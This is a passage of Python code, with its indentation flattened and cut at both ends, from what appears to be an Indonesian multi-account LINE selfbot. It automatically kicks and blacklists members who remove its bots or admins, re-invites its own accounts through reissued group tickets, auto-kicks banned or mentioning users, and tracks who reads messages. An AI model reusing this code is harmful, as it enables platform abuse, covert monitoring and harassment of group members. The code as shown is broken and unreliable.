if op.param3 in admin:
if op.param1 in protectantijs:
wait["blacklist"][op.param2] = True
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
cl.sendMessage(op.param1,"=Admin Invited=")
else:
pass
except:
pass
if op.type == 32:
if op.param1 in protectcancel:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = False
ki.kickoutFromGroup(op.param1,[op.param2])
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
pass
return
if Amid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
G = kk.getGroup(op.param1)
G.preventedJoinByTicket = False
kk.kickoutFromGroup(op.param1,[op.param2])
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kk.getGroup(op.param1)
G.preventedJoinByTicket = True
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
pass
return
if Bmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
G = kc.getGroup(op.param1)
G.preventedJoinByTicket = False
kc.kickoutFromGroup(op.param1,[op.param2])
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kc.getGroup(op.param1)
G.preventedJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
pass
return
if Cmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
kn.kickoutFromGroup(op.param1,[op.param2])
kn.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
G = km.getGroup(op.param1)
G.preventedJoinByTicket = False
km.kickoutFromGroup(op.param1,[op.param2])
km.updateGroup(G)
Ticket = km.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = km.getGroup(op.param1)
G.preventedJoinByTicket = True
km.updateGroup(G)
Ticket = km.reissueGroupTicket(op.param1)
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
pass
if Dmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
except:
try:
kn.kickoutFromGroup(op.param1,[op.param2])
kn.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
except:
try:
ko.kickoutFromGroup(op.param1,[op.param2])
ko.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
except:
try:
G = kb.getGroup(op.param1)
G.preventedJoinByTicket = False
kb.kickoutFromGroup(op.param1,[op.param2])
kb.updateGroup(G)
Ticket = kb.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kb.getGroup(op.param1)
G.preventedJoinByTicket = True
kb.updateGroup(G)
Ticket = kb.reissueGroupTicket(op.param1)
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
except:
try:
kn.kickoutFromGroup(op.param1,[op.param2])
kn.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
except:
pass
return
if Emid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kn.kickoutFromGroup(op.param1,[op.param2])
kn.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
except:
try:
ko.kickoutFromGroup(op.param1,[op.param2])
ko.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
except:
try:
kw.kickoutFromGroup(op.param1,[op.param2])
kw.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
except:
try:
G = kn.getGroup(op.param1)
G.preventedJoinByTicket = False
kn.kickoutFromGroup(op.param1,[op.param2])
kn.updateGroup(G)
Ticket = kn.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kn.getGroup(op.param1)
G.preventedJoinByTicket = True
kn.updateGroup(G)
Ticket = kn.reissueGroupTicket(op.param1)
except:
try:
kn.kickoutFromGroup(op.param1,[op.param2])
kn.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
except:
try:
ko.kickoutFromGroup(op.param1,[op.param2])
ko.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
except:
pass
return
if Fmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ko.kickoutFromGroup(op.param1,[op.param2])
ko.inviteIntoGroup(op.param1,[op.param3])
kn.acceptGroupInvitation(op.param1)
except:
try:
kw.kickoutFromGroup(op.param1,[op.param2])
kw.inviteIntoGroup(op.param1,[op.param3])
kn.acceptGroupInvitation(op.param1)
except:
try:
ke.kickoutFromGroup(op.param1,[op.param2])
ke.inviteIntoGroup(op.param1,[op.param3])
kn.acceptGroupInvitation(op.param1)
except:
try:
G = ko.getGroup(op.param1)
G.preventedJoinByTicket = False
ko.kickoutFromGroup(op.param1,[op.param2])
ko.updateGroup(G)
Ticket = ko.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = ko.getGroup(op.param1)
G.preventedJoinByTicket = True
ko.updateGroup(G)
Ticket = ko.reissueGroupTicket(op.param1)
except:
try:
ko.kickoutFromGroup(op.param1,[op.param2])
ko.inviteIntoGroup(op.param1,[op.param3])
kn.acceptGroupInvitation(op.param1)
except:
try:
kw.kickoutFromGroup(op.param1,[op.param2])
kw.inviteIntoGroup(op.param1,[op.param3])
kn.acceptGroupInvitation(op.param1)
except:
pass
if Gmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kw.kickoutFromGroup(op.param1,[op.param2])
kw.inviteIntoGroup(op.param1,[op.param3])
ko.acceptGroupInvitation(op.param1)
except:
try:
ke.kickoutFromGroup(op.param1,[op.param2])
ke.inviteIntoGroup(op.param1,[op.param3])
ko.acceptGroupInvitation(op.param1)
except:
try:
ky.kickoutFromGroup(op.param1,[op.param2])
ky.inviteIntoGroup(op.param1,[op.param3])
ko.acceptGroupInvitation(op.param1)
except:
try:
G = kw.getGroup(op.param1)
G.preventedJoinByTicket = False
kw.kickoutFromGroup(op.param1,[op.param2])
kw.updateGroup(G)
Ticket = kw.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kw.getGroup(op.param1)
G.preventedJoinByTicket = True
kw.updateGroup(G)
Ticket = kw.reissueGroupTicket(op.param1)
except:
try:
kw.kickoutFromGroup(op.param1,[op.param2])
kw.inviteIntoGroup(op.param1,[op.param3])
ko.acceptGroupInvitation(op.param1)
except:
try:
ke.kickoutFromGroup(op.param1,[op.param2])
ke.inviteIntoGroup(op.param1,[op.param3])
ko.acceptGroupInvitation(op.param1)
except:
pass
return
if Hmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ke.kickoutFromGroup(op.param1,[op.param2])
ke.inviteIntoGroup(op.param1,[op.param3])
kw.acceptGroupInvitation(op.param1)
except:
try:
ky.kickoutFromGroup(op.param1,[op.param2])
ky.inviteIntoGroup(op.param1,[op.param3])
kw.acceptGroupInvitation(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
kw.acceptGroupInvitation(op.param1)
except:
try:
G = ke.getGroup(op.param1)
G.preventedJoinByTicket = False
ke.kickoutFromGroup(op.param1,[op.param2])
ke.updateGroup(G)
Ticket = ke.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = ke.getGroup(op.param1)
G.preventedJoinByTicket = True
ke.updateGroup(G)
Ticket = ke.reissueGroupTicket(op.param1)
except:
try:
ke.kickoutFromGroup(op.param1,[op.param2])
ke.inviteIntoGroup(op.param1,[op.param3])
kw.acceptGroupInvitation(op.param1)
except:
try:
ky.kickoutFromGroup(op.param1,[op.param2])
ky.inviteIntoGroup(op.param1,[op.param3])
kw.acceptGroupInvitation(op.param1)
except:
pass
return
if Imid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ky.kickoutFromGroup(op.param1,[op.param2])
ky.inviteIntoGroup(op.param1,[op.param3])
ke.acceptGroupInvitation(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
ke.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
ke.acceptGroupInvitation(op.param1)
except:
try:
G = ky.getGroup(op.param1)
G.preventedJoinByTicket = False
ky.kickoutFromGroup(op.param1,[op.param2])
ky.updateGroup(G)
Ticket = ky.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = ky.getGroup(op.param1)
G.preventedJoinByTicket = True
ky.updateGroup(G)
Ticket = ky.reissueGroupTicket(op.param1)
except:
try:
ky.kickoutFromGroup(op.param1,[op.param2])
ky.inviteIntoGroup(op.param1,[op.param3])
ke.acceptGroupInvitation(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
ke.acceptGroupInvitation(op.param1)
except:
pass
return
if Jmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
ky.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
ky.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
ky.acceptGroupInvitation(op.param1)
except:
try:
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = False
cl.kickoutFromGroup(op.param1,[op.param2])
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
km.acceptGroupInvitationByTicket(op.param1,Ticket)
kb.acceptGroupInvitationByTicket(op.param1,Ticket)
kn.acceptGroupInvitationByTicket(op.param1,Ticket)
ko.acceptGroupInvitationByTicket(op.param1,Ticket)
kw.acceptGroupInvitationByTicket(op.param1,Ticket)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
ky.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
ky.acceptGroupInvitation(op.param1)
except:
pass
return
if admin in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
random.choice(ABC).findAndAddContactsByMid(op.param1,admin)
random.choice(ABC).inviteIntoGroup(op.param1,admin)
except:
pass
return
if staff in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
random.choice(ABC).findAndAddContactsByMid(op.param1,staff)
random.choice(ABC).inviteIntoGroup(op.param1,staff)
except:
pass
return
if op.type == 55:
try:
if op.param1 in Setmain["ARreadPoint"]:
if op.param2 in Setmain["ARreadMember"][op.param1]:
pass
else:
Setmain["ARreadMember"][op.param1][op.param2] = True
else:
pass
except:
pass
if cctv['cyduk'][op.param1]==True:
if op.param1 in cctv['point']:
Name = cl.getContact(op.param2).displayName
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n~ " + Name
siderMembers(op.param1, [op.param2])
contact = cl.getContact(op.param2)
#image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(op.param1, image)
if op.type == 55:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 26:
if wait["selfbot"] == True:
msg = op.message
if msg._from not in Bots:
if wait["talkban"] == True:
if msg._from in wait["Talkblacklist"]:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
cl.sendMessage(msg.to, wait["Respontag"])
cl.sendMessage(msg.to, None, contentMetadata={"STKID":"7839705","STKPKGID":"1192862","STKVER":"1"}, contentType=7)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["Mentionkick"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
cl.mentiontag(msg.to,[msg._from])
cl.sendMessage(msg.to, "Jangan tag saya....")
cl.kickoutFromGroup(msg.to, [msg._from])
break
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,"ãCek ID Stickerã\nâ§STKID : " + msg.contentMetadata["STKID"] + "\nâ§STKPKGID : " + msg.contentMetadata["STKPKGID"] + "\nâ§STKVER : " + msg.contentMetadata["STKVER"]+ "\n\nãLink Stickerã" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
path = cl.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
cl.sendMessage(msg.to,"â§Nama : " + msg.contentMetadata["displayName"] + "\nâ§MID : " + msg.contentMetadata["mid"] + "\nâ§Status Msg : " + contact.statusMessage + "\nâ§Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
cl.sendImageWithURL(msg.to, image)
if op.type == 25 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0 or msg.toType == 2:
if msg.toType == 0:
to = receiver
elif msg.toType == 2:
to = receiver
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,"STKID : " + msg.contentMetadata["STKID"] + "\nSTKPKGID : " + msg.contentMetadata["STKPKGID"] + "\nSTKVER : " + msg.contentMetadata["STKVER"]+ "\n\nãLink Stickerã" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
path = cl.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
cl.sendMessage(msg.to,"â§Nama : " + msg.contentMetadata["displayName"] + "\nâ§MID : " + msg.contentMetadata["mid"] + "\nâ§Status Msg : " + contact.statusMessage + "\nâ§Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
cl.sendImageWithURL(msg.to, image)
#ADD Bots
if msg.contentType == 13:
if msg._from in admin:
if wait["addbots"] == True:
if msg.contentMetadata["mid"] in Bots:
cl.sendMessage(msg.to,"Contact itu sudah jadi anggota bot")
wait["addbots"] = True
else:
Bots.append(msg.contentMetadata["mid"])
wait["addbots"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke anggota bot")
if wait["dellbots"] == True:
if msg.contentMetadata["mid"] in Bots:
Bots.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari anggota bot")
else:
wait["dellbots"] = True
cl.sendMessage(msg.to,"Contact itu bukan anggota bot Dpk")
#ADD STAFF
if msg._from in admin:
if wait["addstaff"] == True:
if msg.contentMetadata["mid"] in staff:
cl.sendMessage(msg.to,"Contact itu sudah jadi staff")
wait["addstaff"] = True
else:
staff.append(msg.contentMetadata["mid"])
wait["addstaff"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke staff")
if wait["dellstaff"] == True:
if msg.contentMetadata["mid"] in staff:
staff.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari staff")
wait["dellstaff"] = True
else:
wait["dellstaff"] = True
cl.sendMessage(msg.to,"Contact itu bukan staff")
#ADD ADMIN
if msg._from in admin:
if wait["addadmin"] == True:
if msg.contentMetadata["mid"] in admin:
cl.sendMessage(msg.to,"Contact itu sudah jadi admin")
wait["addadmin"] = True
else:
admin.append(msg.contentMetadata["mid"])
wait["addadmin"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke admin")
if wait["delladmin"] == True:
if msg.contentMetadata["mid"] in admin:
admin.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari admin")
else:
wait["delladmin"] = True
cl.sendMessage(msg.to,"Contact itu bukan admin")
#ADD BLACKLIST
if msg._from in admin:
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendMessage(msg.to,"Contact itu sudah ada di blacklist")
wait["wblacklist"] = True
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke blacklist user")
if wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendMessage(msg.to,"Berhasil menghapus dari blacklist user")
else:
wait["dblacklist"] = True
cl.sendMessage(msg.to,"Contact itu tidak ada di blacklist")
#TALKBAN
if msg._from in admin:
if wait["Talkwblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
cl.sendMessage(msg.to,"Contact itu sudah ada di Talkban")
wait["Talkwblacklist"] = True
else:
wait["Talkblacklist"][msg.contentMetadata["mid"]] = True
wait["Talkwblacklist"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke Talkban user")
if wait["Talkdblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
del wait["Talkblacklist"][msg.contentMetadata["mid"]]
cl.sendMessage(msg.to,"Berhasil menghapus dari Talkban user")
else:
wait["Talkdblacklist"] = True
cl.sendMessage(msg.to,"Contact itu tidak ada di Talkban")
#UPDATE FOTO
if msg.contentType == 1:
if msg._from in admin:
if Setmain["Addimage"] == True:
msgid = msg.id
fotoo = "https://obs.line-apps.com/talk/m/download.nhn?oid="+msgid
headers = cl.Talk.Headers
r = requests.get(fotoo, headers=headers, stream=True)
if r.status_code == 200:
